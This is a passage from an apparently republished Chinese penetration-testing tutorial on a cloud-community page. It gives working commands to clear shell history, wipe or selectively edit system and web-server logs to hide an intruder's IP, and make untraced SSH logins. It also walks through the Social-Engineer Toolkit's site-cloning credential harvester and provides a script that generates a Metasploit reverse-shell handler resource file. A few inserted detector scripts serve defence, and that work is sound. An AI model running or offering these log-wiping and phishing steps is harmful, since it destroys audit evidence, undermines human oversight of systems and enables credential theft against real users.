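    with tempfile.TemporaryDirectory() as d:
        clean = os.path.join(d, "untouched.txt")
        stomped = os.path.join(d, "test.txt")
        for p in (clean, stomped):
            with open(p, "w") as fh:
                fh.write("constructed sample content\n")
        before = timestomp_indicator(stomped)
        backdate(stomped, datetime(2018, 4, 18, 8, 0, 0))
        after = timestomp_indicator(stomped)
        return before, after, scan(d)


if __name__ == "__main__":
    print(demo())  # (False, True, ['test.txt'])
```

On a live system the same gap is visible in the Modify and Change lines of `stat <file>`.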
Clearing the shell command history

# Method 1

history       # show the command history (does not work on Kali Linux)
cat ~/.bash_history       # the history file
vim ~/.bash_history
history -c

# Method 2

Open a file with vim:

vim test.txt
# Tell vim not to record commands; by default vim saves its command history in the viminfo file.
:set history=0
:!command

# Method 3

# Edit the configuration file /etc/profile so that the system stops saving command history. By default 1000 commands are kept; change the value to 0, save and exit, then reboot for the change to take effect.

HISTSIZE=0

# Method 4

# Run the following after logging in so that no history (.bash_history) is recorded

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

# Method 5

Kali Linux only:

rm -rf /root/.zsh_history
Clearing system log traces

/var/log/btmp records all failed logins; view it with lastb

/var/log/lastlog records the last login time of every user on the system; view it with lastlog

/var/log/wtmp records all user logins and logouts; view it with last

/var/log/utmp records the users currently logged in; view it with w, who, users, etc.

/var/log/secure records security-related log messages

/var/log/messages records messages and errors since system boot

echo > /var/log/btmp          # clears the failed-login records (viewed with lastb)

echo > /var/log/wtmp          # clears the successful-login records (viewed with last)

echo > /var/log/lastlog       # clears each user's last login time (viewed with lastlog)

echo > /var/log/utmp          # clears the currently-logged-in user information (viewed with w, who, users)

cat /dev/null > /var/log/secure     # clears the security log

cat /dev/null > /var/log/messages   # clears the system log

echo > /var/log/secure    # login information

echo > /var/log/messages

echo > /var/log/syslog    # log of the system logging service

echo>/var/log/xferlog

echo>/var/log/auth.log

echo>/var/log/user.log

cat /dev/null > /var/adm/sylog

cat /dev/null > /var/log/maillog

cat /dev/null > /var/log/openwebmail.log

cat /dev/null > /var/log/mail.info

Clearing system log traces (selective)

# Emptying the log files entirely is too easy for an administrator to notice; deleting or replacing only selected log entries can hide the attack traces perfectly.

# Delete every line matching a string, for example the current date or your own login IP

sed -i '/your-own-ip/'d test.txt

sed -i '/192.168.1.2/'d test.txt

# Replace the login IP address globally:

sed 's/old-string/new-string/g'

sed -i 's/192.168.1.1/192.168.1.2/g' test.txt
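
As an added example, not part of the original post: the sed -i commands above never edit the file in place; sed writes a new file and renames it over the old one, which changes the inode number and shrinks an append-only log. The block models that rewrite and checks a log against a baseline snapshot, the kind a cron job or log shipper could record. The log lines are constructed, with the IP address taken from the page's sed command; log rotation produces the same symptoms, so correlate a hit with the rotation schedule before raising an alert.

```python
# Added example (not from the original post): baseline-based indicators that a
# log file was rewritten in place (inode swap, shrinking size, fewer lines).
import os
import tempfile

# Constructed access-log sample; 192.168.166.85 is the address the page's
# sed command rewrites.
SAMPLE_LOG = (
    '10.0.0.5 - - [19/Jul/2022:17:00:01 +0800] "GET /index.html HTTP/1.1" 200 512\n'
    '192.168.166.85 - - [19/Jul/2022:17:00:12 +0800] "GET /admin/ HTTP/1.1" 401 0\n'
    '192.168.166.85 - - [19/Jul/2022:17:00:13 +0800] "POST /admin/login HTTP/1.1" 200 88\n'
    '10.0.0.5 - - [19/Jul/2022:17:00:30 +0800] "GET /style.css HTTP/1.1" 200 4096\n'
)


def snapshot(path):
    """Baseline metadata: inode, size and line count."""
    st = os.stat(path)
    with open(path, "rb") as fh:
        lines = sum(1 for _ in fh)
    return {"inode": st.st_ino, "size": st.st_size, "lines": lines}


def sed_like_delete(path, needle):
    """Model of `sed -i '/needle/d' path`: filter into a new file, then rename."""
    tmp = path + ".sedtmp"
    with open(path) as src, open(tmp, "w") as dst:
        for line in src:
            if needle not in line:
                dst.write(line)
    os.replace(tmp, path)  # this rename is what swaps the inode


def tamper_indicators(path, baseline):
    """Compare the file's current state with an earlier snapshot."""
    now = snapshot(path)
    reasons = []
    if now["inode"] != baseline["inode"]:
        reasons.append("inode-changed")
    if now["size"] < baseline["size"]:
        reasons.append("shrank")
    if now["lines"] < baseline["lines"]:
        reasons.append("fewer-lines")
    return reasons


def demo():
    """Return the indicators after a normal append and after a sed-style rewrite."""
    with tempfile.TemporaryDirectory() as d:
        log = os.path.join(d, "access.log")
        with open(log, "w") as fh:
            fh.write(SAMPLE_LOG)
        baseline = snapshot(log)
        # A normal append, which is all a live log should ever do, trips nothing.
        with open(log, "a") as fh:
            fh.write('10.0.0.5 - - [19/Jul/2022:17:01:00 +0800] "GET / HTTP/1.1" 200 10\n')
        after_append = tamper_indicators(log, baseline)
        sed_like_delete(log, "192.168.166.85")
        after_sed = tamper_indicators(log, baseline)
        return after_append, after_sed


if __name__ == "__main__":
    print(demo())  # ([], ['inode-changed', 'shrank', 'fewer-lines'])
```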

Hiding remote SSH login records

# Log in without a trace: the session is not shown by w, who, last, etc.

ssh -T root@192.168.0.1 /bin/bash -i

# Do not record the server's public key in the local .ssh directory

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i

Clearing web intrusion traces

# Replace the IP address in the log directly

sed -i 's/192.168.166.85/192.168.1.1/g' apache/logs/access.log

# Common log locations

Apache

%APACHE_HOME%/logs/access.log # access log

%APACHE_HOME%/logs/error.log # error log

Nginx

%NGINX_HOME%/logs/access.log # access log

%NGINX_HOME%/logs/error.log # error log

Tomcat

%TOMCAT_HOME%/logs/localhost_access_log.YYYY_MM_DD.txt # request log

%TOMCAT_HOME%/logs/catalina.YYYY_MM_DD.log # startup log

%TOMCAT_HOME%/logs/localhost.YYYY_MM_DD.log # localhost log

%TOMCAT_HOME%/logs/host-manager.YYYY_MM_DD.log # host-manager log

%TOMCAT_HOME%/logs/manager.YYYY_MM_DD.log # manager log

Clearing MySQL traces

rm ~/.mysql_history
cat /dev/null > ~/.mysql_history

Social engineering

git clone https://github.com/trustedsec/social-engineer-toolkit/
cd social-engineer-toolkit
pip3 install -r requirements.txt
python setup.py
gedit /etc/setoolkit/set.config

Spear-phishing attack vector

Uses file-format vulnerabilities (e.g. PDF) to generate a backdoored attachment and sends it to the target by email (Gmail, Sendmail, ...), enticing the target to open the attachment and activate the backdoor.

Example:

# cd /usr/share/set
# ./setoolkit   (then choose from the menus)
1) Social-Engineering Attacks
1) Perform a Mass Email Attack
3) Credential Harvester Attack Method
2) Site Cloner
…
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.0.150]: 192.168.0.150
set:webattack> Enter the url to clone: www.baidu.com
[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

Web attack vectors

SET can clone a website and plant a backdoor in it to trick the target into opening the site and getting compromised.

Java Applet attack

One of the most successful methods. It does not exploit a Java vulnerability: when the target browses the backdoored clone site they are asked whether to allow the page's Java applet to run; once they click allow, the payload runs and the target is redirected to the real website.

Client-side web exploit

Exploits a software vulnerability on the client; attacks with a 0-day generally work best.

Username and Password Harvesting

Clone a target site and lure the target into logging in, capturing their credentials, for example a Gmail password.

Tabnabbing: while the target has several tabs open and switches between them, the site detects this and shows a "please wait" message. When the target comes back to the hijacked tab it asks them to enter their credentials on a strikingly similar-looking site; once entered, the login is captured and the target is redirected to the real site.

Man-Left-in-the-Middle

This method uses HTTP requests from an already compromised website, or an XSS vulnerability in a website, to send the user's login information to the attacker's HTTP server. If you find an XSS vulnerability in a site, you can build a URL from it, send it to the target and entice them to open it and log in, capturing the credentials.

Web Jacking

When the target opens our site, a link is shown that appears to be the correct web address; if the target follows this fake link they are sent to our cloned site and their credentials are captured.

Multi-attack

Several of the methods above can be combined to raise the success rate.

Infectious Media Generator

Lets you build a CD or USB stick containing an autorun.inf that launches a chosen backdoor file or file-format exploit file.

Teensy USB HID

When autorun.inf is disabled for inserted USB devices, this method makes the USB device emulate a keyboard or mouse, which can then capture keystrokes on the target machine.

Other SET features

These include the SET interactive shell, usable as a replacement for Meterpreter; the remote administration tool (RATTE); HTTP tunnelling, for communicating with a host that only allows outbound HTTP; and the WEB-GUI, which contains wizards for common attacks and wireless attacks and is started with ./set-web.

This article is part of the Tencent Cloud self-media sharing program and was shared from a WeChat official account.
Originally published: 2022-07-22. In case of infringement, contact cloudcommunity@tencent.com for removal.

This article was shared from the 软件测试培训 WeChat official account.

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 通讯协议
    • ARP
      • ICMP
        • TCP
        • 专业术语
          • 渗透攻击(Exploit)
            • 攻击载荷(Payload)
              • Shellcode
                • 模块(Module)
                  • 监听器(Listener)
                    • 编码器(encoders)
                    • Metasploit用户接口
                      • MSF终端
                        • MSF命令行
                          • Armitage
                          • Metasploit功能程序
                            • MSF攻击荷载生成器
                              • MSF编码器
                                • MSF攻击载荷
                                  • MSF NOP
                                    • MSF平台
                                      • MSF有效负载和--编码器的体系结构
                                        • MSF应用于外壳代码的加密或编码类型
                                          • 查看配置
                                            • Nasm shell
                                            • Metasploit Express & Metasploit Pro
                                            • 信息收集
                                              • 被动信息搜索
                                                • Whois
                                                • netcraft
                                                • Maltego
                                                • sn0int
                                                • ZoomEye
                                                • nslookup
                                                • metasploit使用数据库扫描
                                                • 利用辅助模块
                                                • 漏洞扫描
• Starting the penetration test
  • Common msf6 commands
    • `msf6 > show exploits`: list all available exploit modules
  • Antivirus evasion
    • msfvenom
    • Evading antivirus detection
  • Starting the attack
    • Exploiting host vulnerabilities
    • Exploiting client-side vulnerabilities
  • Resource files
    • The most basic resource file
    • Resource file for attacking Windows 7
    • Resource file for attacking Windows 10
    • Resource file for attacking Android
    • Penetrating Linux
• Meterpreter guide (post-exploitation)
  • Basic commands
    • Common meterpreter commands
    • Some Windows-specific commands
    • Other commands
    • Shell scripts
  • File system commands
    • upload
    • search
    • enumdesktops
    • ipconfig
  • Other commands
    • Taking screenshots
    • Getting system information
    • Capturing keystrokes
  • Privilege escalation
    • Basic privilege escalation
    • Privilege escalation via vulnerabilities
    • Privilege escalation by bypassing UAC
    • Triggering the UAC mechanism
  • Obtaining usernames and passwords
    • Extracting password hashes
    • Adding a user via token impersonation
  • Pivoting
    • Running VNC
    • Migrating processes
    • Obtaining system password hashes
    • Capturing traffic on the target machine
    • Getting system information
    • Persistence
    • Upgrading a command shell to Meterpreter
  • Exploiting the IE browser Aurora vulnerability
    • Windows
    • Linux
    • Clearing web intrusion traces
    • Clearing MySQL traces
• Social engineering
  • Web-based attacks
    • Java Applet method
    • Client-side web exploit method
    • Username and Password Harvesting
    • Man-Left-in-the-Middle attack
    • Web Jacking
    • Multi-attack web method
    • Infectious Media Generator
    • Teensy USB HID attack
    • Other SET features
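The outline above lists "the most basic resource file" under Resource files, and the user-interface section earlier on this page shows `msfconsole -r path/xxx.rc`. A resource file is nothing more than msfconsole commands, one per line, replayed in order. The following added example (not code from the original page or from the Metasploit project) is a small POSIX shell helper that writes such a file for a `multi/handler` listener and rejects an invalid LPORT before anything is written; the path, LHOST, LPORT and payload values are placeholders chosen for the example.

```shell
#!/bin/sh
# Added example: write a minimal Metasploit resource file for a reverse-TCP
# handler. Resource files are plain msfconsole commands, one per line,
# replayed with `msfconsole -r file.rc`. All values below are placeholders.

write_handler_rc() {
  rc="$1"
  lhost="$2"
  lport="$3"
  # Default payload if none is given; any msfvenom-compatible payload works.
  payload="${4:-windows/meterpreter/reverse_tcp}"

  # Reject non-numeric or out-of-range ports before writing the file;
  # msfconsole would only notice when the handler tries to bind.
  case "$lport" in
    ''|*[!0-9]*) echo "bad LPORT: $lport" >&2; return 1 ;;
  esac
  [ "$lport" -ge 1 ] && [ "$lport" -le 65535 ] || {
    echo "bad LPORT: $lport" >&2
    return 1
  }

  # ExitOnSession false keeps the handler listening after the first session;
  # -j runs it as a background job and -z does not drop into the session.
  cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Usage (placeholder values):
#   write_handler_rc handler.rc 192.168.56.101 4444
#   msfconsole -q -r handler.rc
```

The generated file is the same thing you would type interactively into `msf6 >`; keeping it in a script makes the listener reproducible across lab runs and pairs naturally with the msfvenom payload built in the antivirus-evasion section.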